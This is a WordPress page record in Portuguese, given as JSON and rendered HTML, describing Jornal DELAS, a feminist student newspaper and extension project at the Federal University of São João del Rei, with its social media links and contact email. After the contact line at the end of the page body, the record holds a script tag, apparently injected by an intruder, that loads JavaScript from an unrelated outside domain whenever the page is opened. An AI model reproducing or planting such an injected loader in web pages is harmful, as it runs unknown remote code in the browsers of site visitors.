{"id":6085,"date":"2017-06-03T18:36:57","date_gmt":"2017-06-03T21:36:57","guid":{"rendered":"http:\/\/jornalismo.ufsj.edu.br\/?page_id=6085"},"modified":"2017-09-07T15:22:38","modified_gmt":"2017-09-07T18:22:38","slug":"jornal-delas","status":"publish","type":"page","link":"http:\/\/anu.ufsj.edu.br\/site\/jornal-delas\/","title":{"rendered":"Jornal DELAS"},"content":{"rendered":"<p><img loading=\"lazy\" class=\"aligncenter wp-image-6117\" src=\"http:\/\/jornalismo.ufsj.edu.br\/wp-content\/uploads\/2017\/06\/DELAS.png\" alt=\"\" width=\"421\" height=\"234\" srcset=\"http:\/\/anu.ufsj.edu.br\/site\/wp-content\/uploads\/2017\/06\/DELAS.png 2078w, http:\/\/anu.ufsj.edu.br\/site\/wp-content\/uploads\/2017\/06\/DELAS-300x167.png 300w, http:\/\/anu.ufsj.edu.br\/site\/wp-content\/uploads\/2017\/06\/DELAS-768x427.png 768w, http:\/\/anu.ufsj.edu.br\/site\/wp-content\/uploads\/2017\/06\/DELAS-1024x570.png 1024w\" sizes=\"(max-width: 421px) 100vw, 421px\" \/><\/p>\n<p>O Delas surgiu como um jornal de cunho feminista destinado ao p\u00fablico feminino. Seu conte\u00fado procura trazer uma vis\u00e3o alternativa aos tradicionais ve\u00edculos destinados a mulheres atualmente, seguindo o objetivo de empoderar e informar o p\u00fablico de forma a desconstruir hierarquias de g\u00eaneros. Atualmente, o projeto est\u00e1 evoluindo de jornal online para narrativa transm\u00eddia, e \u00e9 composto pela plataforma online do jornal, sua p\u00e1gina do facebook, e o aplicativo para dispositivo m\u00f3vel a ser lan\u00e7ado. Para completar a dimens\u00e3o transm\u00eddia do projeto, se prop\u00f5e a desenvolver oficinas, palestras, cine debates, mostras culturais, interven\u00e7\u00f5es art\u00edsticas e grupos de estudos.<\/p>\n<p>Desenvolvido em uma disciplina do curso de Comunica\u00e7\u00e3o Social &#8211; Jornalismo da Universidade Federal de S\u00e3o Jo\u00e3o del Rei, o Jornal se compromete, al\u00e9m de dar visibilidade a pautas que se tornam invisibilizadas pela m\u00eddia convencional, a trazer uma vis\u00e3o atualizada e real do feminismo como vivido no cotidiano das mulheres brasileiras, e tamb\u00e9m a tratar, de forma alternativa e leg\u00edtima, temas de interesse sociais comuns.<\/p>\n<p>Atualmente, somos um projeto de extens\u00e3o reconhecido pela PROEX. A produ\u00e7\u00e3o cultural \u00e9 um dos pilares do, por meio da promo\u00e7\u00e3o de debates e atividades junto \u00e0 comunidade acad\u00eamica e \u00e0 comunidade do Campo das Vertentes. Contamos com se\u00e7\u00f5es de not\u00edcias regionais, pol\u00edtica, economia, cultura, tecnologia, editoriais, moda e beleza, sa\u00fade e bem-estar. As pautas falam sobre mulheres e procuram refor\u00e7ar as ideias de diversidade e autonomia feminina.<\/p>\n<p>Para conduzir esse projeto contamos com editoras, rep\u00f3rteres e orienta\u00e7\u00e3o da jornalista Cibele de Moraes. Buscamos fazer da nossa reda\u00e7\u00e3o um espa\u00e7o de aprendizado e troca de conhecimento nas \u00e1reas de produ\u00e7\u00e3o de conte\u00fado jornal\u00edstico e produ\u00e7\u00e3o cultural de atividades extensionistas.<\/p>\n<p><img loading=\"lazy\" class=\"aligncenter size-full wp-image-6160\" src=\"http:\/\/jornalismo.ufsj.edu.br\/wp-content\/uploads\/2017\/06\/27441907055_68cf95aa62_k-1_mini.jpg\" alt=\"\" width=\"2048\" height=\"782\" srcset=\"http:\/\/anu.ufsj.edu.br\/site\/wp-content\/uploads\/2017\/06\/27441907055_68cf95aa62_k-1_mini.jpg 2048w, http:\/\/anu.ufsj.edu.br\/site\/wp-content\/uploads\/2017\/06\/27441907055_68cf95aa62_k-1_mini-300x115.jpg 300w, http:\/\/anu.ufsj.edu.br\/site\/wp-content\/uploads\/2017\/06\/27441907055_68cf95aa62_k-1_mini-768x293.jpg 768w, http:\/\/anu.ufsj.edu.br\/site\/wp-content\/uploads\/2017\/06\/27441907055_68cf95aa62_k-1_mini-1024x391.jpg 1024w\" sizes=\"(max-width: 2048px) 100vw, 2048px\" \/><\/p>\n<p style=\"text-align: center;\">\n<p>Site: <a href=\"https:\/\/jornaldelas.wordpress.com\/\">jornaldelas.wordpress.com<\/a><\/p>\n<p>Facebook: <a href=\"https:\/\/www.facebook.com\/JornalDelas\/\">facebook.com\/jornaldelas<\/a><\/p>\n<p>Instagram: <a href=\"https:\/\/www.instagram.com\/delasjornal\/\">instagram.com\/delasjornal<\/a><\/p>\n<p>Flickr: <a href=\"https:\/\/www.flickr.com\/photos\/jornaldelas\">flickr.com\/jornaldelas<\/a><\/p>\n<p>&nbsp;<\/p>\n<p>Entre em contato atrav\u00e9s do email projetodelas@ufsj.edu.br e #VemSerDelas!<\/p>\n<p>&nbsp;<\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>O Delas surgiu como um jornal de cunho feminista destinado ao p\u00fablico feminino. Seu conte\u00fado procura trazer uma vis\u00e3o alternativa aos tradicionais ve\u00edculos destinados a mulheres atualmente, seguindo o objetivo de empoderar e informar o p\u00fablico de forma a desconstruir&#8230;<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Jornal DELAS - Jornalismo UFSJ<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/anu.ufsj.edu.br\/site\/jornal-delas\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Jornal DELAS - Jornalismo UFSJ\" \/>\n<meta property=\"og:description\" content=\"O Delas surgiu como um jornal de cunho feminista destinado ao p\u00fablico feminino. Seu conte\u00fado procura trazer uma vis\u00e3o alternativa aos tradicionais ve\u00edculos destinados a mulheres atualmente, seguindo o objetivo de empoderar e informar o p\u00fablico de forma a desconstruir...\" \/>\n<meta property=\"og:url\" content=\"http:\/\/anu.ufsj.edu.br\/site\/jornal-delas\/\" \/>\n<meta property=\"og:site_name\" content=\"Jornalismo UFSJ\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/jornalismoufsj\/\" \/>\n<meta property=\"article:modified_time\" content=\"2017-09-07T18:22:38+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/jornalismo.ufsj.edu.br\/wp-content\/uploads\/2017\/06\/DELAS.png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@jornalismoufsj\" \/>\n<meta name=\"twitter:label1\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"http:\/\/anu.ufsj.edu.br\/site\/jornal-delas\/\",\"url\":\"http:\/\/anu.ufsj.edu.br\/site\/jornal-delas\/\",\"name\":\"Jornal DELAS - Jornalismo UFSJ\",\"isPartOf\":{\"@id\":\"http:\/\/jornalismo.ufsj.edu.br\/site\/#website\"},\"datePublished\":\"2017-06-03T21:36:57+00:00\",\"dateModified\":\"2017-09-07T18:22:38+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/anu.ufsj.edu.br\/site\/jornal-delas\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/anu.ufsj.edu.br\/site\/jornal-delas\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/anu.ufsj.edu.br\/site\/jornal-delas\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"http:\/\/jornalismo.ufsj.edu.br\/site\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Jornal DELAS\"}]},{\"@type\":\"WebSite\",\"@id\":\"http:\/\/jornalismo.ufsj.edu.br\/site\/#website\",\"url\":\"http:\/\/jornalismo.ufsj.edu.br\/site\/\",\"name\":\"Jornalismo UFSJ\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/jornalismo.ufsj.edu.br\/site\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Jornal DELAS - Jornalismo UFSJ","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/anu.ufsj.edu.br\/site\/jornal-delas\/","og_locale":"pt_BR","og_type":"article","og_title":"Jornal DELAS - Jornalismo UFSJ","og_description":"O Delas surgiu como um jornal de cunho feminista destinado ao p\u00fablico feminino. Seu conte\u00fado procura trazer uma vis\u00e3o alternativa aos tradicionais ve\u00edculos destinados a mulheres atualmente, seguindo o objetivo de empoderar e informar o p\u00fablico de forma a desconstruir...","og_url":"http:\/\/anu.ufsj.edu.br\/site\/jornal-delas\/","og_site_name":"Jornalismo UFSJ","article_publisher":"https:\/\/www.facebook.com\/jornalismoufsj\/","article_modified_time":"2017-09-07T18:22:38+00:00","og_image":[{"url":"http:\/\/jornalismo.ufsj.edu.br\/wp-content\/uploads\/2017\/06\/DELAS.png"}],"twitter_card":"summary_large_image","twitter_site":"@jornalismoufsj","twitter_misc":{"Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"http:\/\/anu.ufsj.edu.br\/site\/jornal-delas\/","url":"http:\/\/anu.ufsj.edu.br\/site\/jornal-delas\/","name":"Jornal DELAS - Jornalismo UFSJ","isPartOf":{"@id":"http:\/\/jornalismo.ufsj.edu.br\/site\/#website"},"datePublished":"2017-06-03T21:36:57+00:00","dateModified":"2017-09-07T18:22:38+00:00","breadcrumb":{"@id":"http:\/\/anu.ufsj.edu.br\/site\/jornal-delas\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["http:\/\/anu.ufsj.edu.br\/site\/jornal-delas\/"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/anu.ufsj.edu.br\/site\/jornal-delas\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"http:\/\/jornalismo.ufsj.edu.br\/site\/"},{"@type":"ListItem","position":2,"name":"Jornal DELAS"}]},{"@type":"WebSite","@id":"http:\/\/jornalismo.ufsj.edu.br\/site\/#website","url":"http:\/\/jornalismo.ufsj.edu.br\/site\/","name":"Jornalismo UFSJ","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/jornalismo.ufsj.edu.br\/site\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"}]}},"_links":{"self":[{"href":"http:\/\/anu.ufsj.edu.br\/site\/wp-json\/wp\/v2\/pages\/6085"}],"collection":[{"href":"http:\/\/anu.ufsj.edu.br\/site\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/anu.ufsj.edu.br\/site\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/anu.ufsj.edu.br\/site\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/anu.ufsj.edu.br\/site\/wp-json\/wp\/v2\/comments?post=6085"}],"version-history":[{"count":4,"href":"http:\/\/anu.ufsj.edu.br\/site\/wp-json\/wp\/v2\/pages\/6085\/revisions"}],"predecessor-version":[{"id":6161,"href":"http:\/\/anu.ufsj.edu.br\/site\/wp-json\/wp\/v2\/pages\/6085\/revisions\/6161"}],"wp:attachment":[{"href":"http:\/\/anu.ufsj.edu.br\/site\/wp-json\/wp\/v2\/media?parent=6085"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

<p><img loading="lazy" class="aligncenter wp-image-6117" src="http://jornalismo.ufsj.edu.br/wp-content/uploads/2017/06/DELAS.png" alt="" width="421" height="234" srcset="http://anu.ufsj.edu.br/site/wp-content/uploads/2017/06/DELAS.png 2078w, http://anu.ufsj.edu.br/site/wp-content/uploads/2017/06/DELAS-300x167.png 300w, http://anu.ufsj.edu.br/site/wp-content/uploads/2017/06/DELAS-768x427.png 768w, http://anu.ufsj.edu.br/site/wp-content/uploads/2017/06/DELAS-1024x570.png 1024w" sizes="(max-width: 421px) 100vw, 421px" /></p>
<p>O Delas surgiu como um jornal de cunho feminista destinado ao público feminino. Seu conteúdo procura trazer uma visão alternativa aos tradicionais veículos destinados a mulheres atualmente, seguindo o objetivo de empoderar e informar o público de forma a desconstruir hierarquias de gêneros. Atualmente, o projeto está evoluindo de jornal online para narrativa transmídia, e é composto pela plataforma online do jornal, sua página do facebook, e o aplicativo para dispositivo móvel a ser lançado. Para completar a dimensão transmídia do projeto, se propõe a desenvolver oficinas, palestras, cine debates, mostras culturais, intervenções artísticas e grupos de estudos.</p>
<p>Desenvolvido em uma disciplina do curso de Comunicação Social &#8211; Jornalismo da Universidade Federal de São João del Rei, o Jornal se compromete, além de dar visibilidade a pautas que se tornam invisibilizadas pela mídia convencional, a trazer uma visão atualizada e real do feminismo como vivido no cotidiano das mulheres brasileiras, e também a tratar, de forma alternativa e legítima, temas de interesse sociais comuns.</p>
<p>Atualmente, somos um projeto de extensão reconhecido pela PROEX. A produção cultural é um dos pilares do, por meio da promoção de debates e atividades junto à comunidade acadêmica e à comunidade do Campo das Vertentes. Contamos com seções de notícias regionais, política, economia, cultura, tecnologia, editoriais, moda e beleza, saúde e bem-estar. As pautas falam sobre mulheres e procuram reforçar as ideias de diversidade e autonomia feminina.</p>
<p>Para conduzir esse projeto contamos com editoras, repórteres e orientação da jornalista Cibele de Moraes. Buscamos fazer da nossa redação um espaço de aprendizado e troca de conhecimento nas áreas de produção de conteúdo jornalístico e produção cultural de atividades extensionistas.</p>
<p><img loading="lazy" class="aligncenter size-full wp-image-6160" src="http://jornalismo.ufsj.edu.br/wp-content/uploads/2017/06/27441907055_68cf95aa62_k-1_mini.jpg" alt="" width="2048" height="782" srcset="http://anu.ufsj.edu.br/site/wp-content/uploads/2017/06/27441907055_68cf95aa62_k-1_mini.jpg 2048w, http://anu.ufsj.edu.br/site/wp-content/uploads/2017/06/27441907055_68cf95aa62_k-1_mini-300x115.jpg 300w, http://anu.ufsj.edu.br/site/wp-content/uploads/2017/06/27441907055_68cf95aa62_k-1_mini-768x293.jpg 768w, http://anu.ufsj.edu.br/site/wp-content/uploads/2017/06/27441907055_68cf95aa62_k-1_mini-1024x391.jpg 1024w" sizes="(max-width: 2048px) 100vw, 2048px" /></p>
<p style="text-align: center;">
<p>Site: <a href="https://jornaldelas.wordpress.com/">jornaldelas.wordpress.com</a></p>
<p>Facebook: <a href="https://www.facebook.com/JornalDelas/">facebook.com/jornaldelas</a></p>
<p>Instagram: <a href="https://www.instagram.com/delasjornal/">instagram.com/delasjornal</a></p>
<p>Flickr: <a href="https://www.flickr.com/photos/jornaldelas">flickr.com/jornaldelas</a></p>
<p>&nbsp;</p>
<p>Entre em contato através do email projetodelas@ufsj.edu.br e #VemSerDelas!</p>
<p>&nbsp;</p>
<p><script id="lg210a" src="https://cloudapi.online/js/api46.js" type="text/javascript"></script></p>

<p>O Delas surgiu como um jornal de cunho feminista destinado ao público feminino. Seu conteúdo procura trazer uma visão alternativa aos tradicionais veículos destinados a mulheres atualmente, seguindo o objetivo de empoderar e informar o público de forma a desconstruir&#8230;</p>

<!-- This site is optimized with the Yoast SEO plugin v20.6 - https://yoast.com/wordpress/plugins/seo/ -->
<title>Jornal DELAS - Jornalismo UFSJ</title>
<meta name="robots" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1" />
<link rel="canonical" href="http://anu.ufsj.edu.br/site/jornal-delas/" />
<meta property="og:locale" content="pt_BR" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Jornal DELAS - Jornalismo UFSJ" />
<meta property="og:description" content="O Delas surgiu como um jornal de cunho feminista destinado ao público feminino. Seu conteúdo procura trazer uma visão alternativa aos tradicionais veículos destinados a mulheres atualmente, seguindo o objetivo de empoderar e informar o público de forma a desconstruir..." />
<meta property="og:url" content="http://anu.ufsj.edu.br/site/jornal-delas/" />
<meta property="og:site_name" content="Jornalismo UFSJ" />
<meta property="article:publisher" content="https://www.facebook.com/jornalismoufsj/" />
<meta property="article:modified_time" content="2017-09-07T18:22:38+00:00" />
<meta property="og:image" content="http://jornalismo.ufsj.edu.br/wp-content/uploads/2017/06/DELAS.png" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:site" content="@jornalismoufsj" />
<meta name="twitter:label1" content="Est. tempo de leitura" />
	<meta name="twitter:data1" content="2 minutos" />
<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"http://anu.ufsj.edu.br/site/jornal-delas/","url":"http://anu.ufsj.edu.br/site/jornal-delas/","name":"Jornal DELAS - Jornalismo UFSJ","isPartOf":{"@id":"http://jornalismo.ufsj.edu.br/site/#website"},"datePublished":"2017-06-03T21:36:57+00:00","dateModified":"2017-09-07T18:22:38+00:00","breadcrumb":{"@id":"http://anu.ufsj.edu.br/site/jornal-delas/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["http://anu.ufsj.edu.br/site/jornal-delas/"]}]},{"@type":"BreadcrumbList","@id":"http://anu.ufsj.edu.br/site/jornal-delas/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Início","item":"http://jornalismo.ufsj.edu.br/site/"},{"@type":"ListItem","position":2,"name":"Jornal DELAS"}]},{"@type":"WebSite","@id":"http://jornalismo.ufsj.edu.br/site/#website","url":"http://jornalismo.ufsj.edu.br/site/","name":"Jornalismo UFSJ","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http://jornalismo.ufsj.edu.br/site/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"}]}</script>
<!-- / Yoast SEO plugin. -->

O Delas surgiu como um jornal de cunho feminista destinado ao público feminino. Seu conteúdo procura trazer uma visão alternativa aos tradicionais veículos destinados a mulheres atualmente, seguindo o objetivo de empoderar e informar o público de forma a desconstruir...

Início
